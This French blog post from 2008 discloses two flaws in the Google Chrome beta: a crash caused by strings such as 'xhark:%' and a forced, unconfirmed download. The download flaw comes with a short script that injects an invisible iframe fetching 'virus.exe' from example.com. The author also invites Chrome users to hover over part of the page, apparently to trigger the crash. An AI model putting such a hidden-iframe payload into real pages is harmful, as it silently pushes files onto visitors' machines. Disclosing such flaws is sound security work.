(modifié le 4 septembre 2008 à 10:20)

Le navigateur de Google reste en version bêta, trop de gens ont tendance à l'oublier ! Surement à cause du fait que trop de sites internet s'affichent en version bêta (et Google est loin d'être le dernier dans ce domaine !).

C'est donc tombé, 2 failles DoS (Denial of Service) pour Google Chrome.

[nice_info]Vous êtes septiques et pensez que ces failles doitvent encore mériter de nombreuses bidouilles ?[/nice_info]

1 - La Faille DoS

Ouvre Google Chrome et revenez sur cet article, puis survollez ce texte avec votre souris (le clic n'est même pas nécessaire). Alors heureux ? Ah oui, très heureux 🙂

Le simple fait de mettre "xhark:%" dans la barre d'adresse fait planter Google Chrome (aucun rapport avec moi, vous pouvez mettre "toto%") . Je dis bien Google Chrome et non l'onglet en cours, car Google avait prévu de parquer chaque onglet pour ne pas avoir un navigateur complètement planté à cause d'un seul onglet. Résultat : c'est pas le cas, Chrome plante complètement :

J'ai testé la faille sur XP SP3 et Vista SP1, tous deux impactés.

Le problème vient du fichier chrome.dll (version 0.2.149.27), en fait le navigateur ne comprend pas le type de fichier envoyé et plante.

2 - La faille du téléchargement automatique

Cette faille est beaucoup plus préoccupante que la première... elle permet de forcer un téléchargement sur votre machine, sans aucune confirmation (un exécutable ou virus par exemple), via une simple iframe (fonctionne sur Vista SP1 et XP SP3) :

[nice_code]<script>
document.write('<iframe src="http://www.example.com/virus.exe" frameborder="0" width="0" height="0">');
</script>[/nice_code]

Simple mais efficace pour celui qui n'a pas d'antivirus ou autre. Nous pouvons même imaginer de mettre un fichier très lourd, ce qui saturera votre connexion internet. Je pense à nos amis de belgiques qui ont des quotas imposés par leur fournisseurs d'accès (et oui ça existe encore ! 😉 ). Ou encore à celui dont l'ip fera parti d'une liste à surveiller par le gouvernement car via l'iframe le lien contenait un lien vers un site pédophile ou autre...

Bref vous l'aurez compris ce genre de faille n'est pas à prendre à la légère. Voilà qui devrait calmer tous ceux qui ont déjà abandonné leur Firefox ou Opera. Tous deux restent dans le domaine de la sécurité deux gros poids lourds 😉

Pourquoi s'alarmer ?

Ce qui me fait plutôt peur, c'est lorsque je regarde les statistiques du blog au niveau des navigateurs : hier, vous étiez 21,3% à afficher le blog avec Chrome, sûrement pour l'essayer hein 😉 Mais cela veut dire que le nombre de gens utilisant Chrome ne cessera d'augmenter, et que si Google ne réagit pas très rapidement sur ce genre de problèmes Chrome risque très vite d'avoir mauvaise réputation... et vous auriez raison de le penser.

La version de Google Chrome impactée par cette faille est la v. bêta 0.2.149.27.

[nice_link]Faille numéro 1 reconnue par Google[/nice_link]

Auteur : Mr Xhark

Fondateur du blog et passionné par les nouvelles techno, suivez-moi sur twitter